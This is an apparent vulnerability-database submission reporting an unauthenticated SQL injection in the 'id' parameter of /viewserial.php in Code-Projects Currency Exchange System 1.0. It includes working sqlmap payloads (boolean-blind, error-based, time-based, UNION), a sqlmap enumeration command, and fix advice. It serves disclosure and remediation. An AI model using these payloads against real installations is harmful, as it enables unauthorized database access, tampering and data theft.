Súbít #701152: Code-Projects Currency Exchange System 1.0 /viewserial.php SQL Injectionbayani

Kura	Code-Projects Currency Exchange System 1.0 /viewserial.php SQL Injection
Gaskiya	# ???? Vulnerability Report: Code-Projects Currency Exchange System V1.0 /viewserial.php SQL Injection ## ???? Summary \| Detail \| Content \| \| :--- \| :--- \| \| Affected Product Name \| Library System \| \| Affected Version \| V1.0 \| \| Vendor Homepage \| `https://code-projects.org/currency-exchange-system-in-php-with-source-code/` \| \| Vulnerability Type \| SQL Injection (SQLi) \| \| Affected File \| `/viewserial.php` \| \| Affected Parameter \| `id` (GET) \| \| Authentication Required \| None (No login or authorization required to exploit) \| \| Submitter \| yudeshui \| ----- ## ???? Description and Impact ### Root Cause The vulnerability resides in the file `/viewserial.php`, where the application processes user-supplied input from the `id` (ID) parameter. The program directly concatenates this parameter value into the SQL query string without sufficient cleaning, validation, or sanitization. ### Impact A successful attack allows an attacker to inject malicious SQL code, thereby manipulating the original database query logic. This can lead to severe consequences, including: * Unauthorized Database Access: Stealing sensitive data such as user information or book records. * Data Tampering/Destruction: Modifying, deleting, or adding records in the database. * System Control: In severe cases, gaining system-level control, posing a serious threat to system security and business continuity. ----- ## ????️ Vulnerability Details and PoC The vulnerability is located in the processing of the `id` parameter within a GET request. ### PoC Payload Examples The following are examples of SQL injection payloads captured during testing with the `sqlmap` tool: ``` --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: id=1' OR NOT 5995=5995# Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' OR (SELECT 2994 FROM(SELECT COUNT(),CONCAT(0x7178627871,(SELECT (ELT(2994=2994,1))),0x717a6b6b71,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wFBK Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 1234 FROM (SELECT(SLEEP(5)))tyCf)-- xvUQ Type: UNION query Title: MySQL UNION query (NULL) - 12 columns Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178627871,0x5a494f4d74687455756b657159735951464c4d70634c726741724c615275414d54566c6f45595159,0x717a6b6b71),NULL,NULL,NULL,NULL,NULL# --- ``` ### Sqlmap Screenshot Example (Database Enumeration) ``` sqlmap -u "http://dede:802/viewserial.php?id=1" --batch --dbs ``` ----- <img width="1365" height="568" alt="Image" src="https://github.com/user-attachments/assets/4dc26c32-4bca-4e30-9c4a-e1ea193d61a8" /> ## ✅ Suggested Repair Measures To completely resolve this SQL injection issue and enhance overall system security, the following defensive coding practices are strongly recommended: ### 1\. Use Prepared Statements and Parameter Binding (Primary Defense) This is the most effective method against SQL injection. Prepared statements separate the structure of the SQL command from the user-supplied data, ensuring the input is treated as a literal string value and cannot be interpreted as executable SQL code. * Action: Rewrite all database queries in `/viewserial.php` (and all other files) to use Prepared Statements (e.g., using `mysqli_prepare()` or PDO with parameter binding). ### 2\. Strict Input Validation and Filtering Strictly validate and filter all user input data to ensure it conforms to the expected format, type, and length. * Action: For parameters like `id` which should be numeric, use PHP functions like `filter_var()` or `is_numeric()` for strict checking. ### 3\. Minimize Database User Permissions Adhere to the Principle of Least Privilege. The database account used by the web application for daily operations should only possess the minimum necessary permissions. * Action: Ensure the application's database user does not have administrative privileges (e.g., `DROP`, `ALTER`, or file system access) to limit the impact of a successful breach. ### 4\. Regular Security Audits Establish a routine process for security code reviews and auditing to proactively identify and fix potential vulnerabilities before they are exploited. ----- Would you like me to provide a specific code example in PHP demonstrating how to use prepared statements to fix this vulnerability?
Manga	⚠️ https://github.com/rassec2/dbcve/issues/13
Màdùmga	yudeshui (UID 91129)
Furta	11/25/2025 13:48 (3 Wurɗi 전)
Gargajiya	12/07/2025 16:18 (12 days later)
Halitta	Shingilam
VulDB gite	334658 [code-projects Currency Exchange System 1.0 /viewserial.php ID SQL Injection]
Nganji	20

◂ Gurɗo Gumti Gada ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!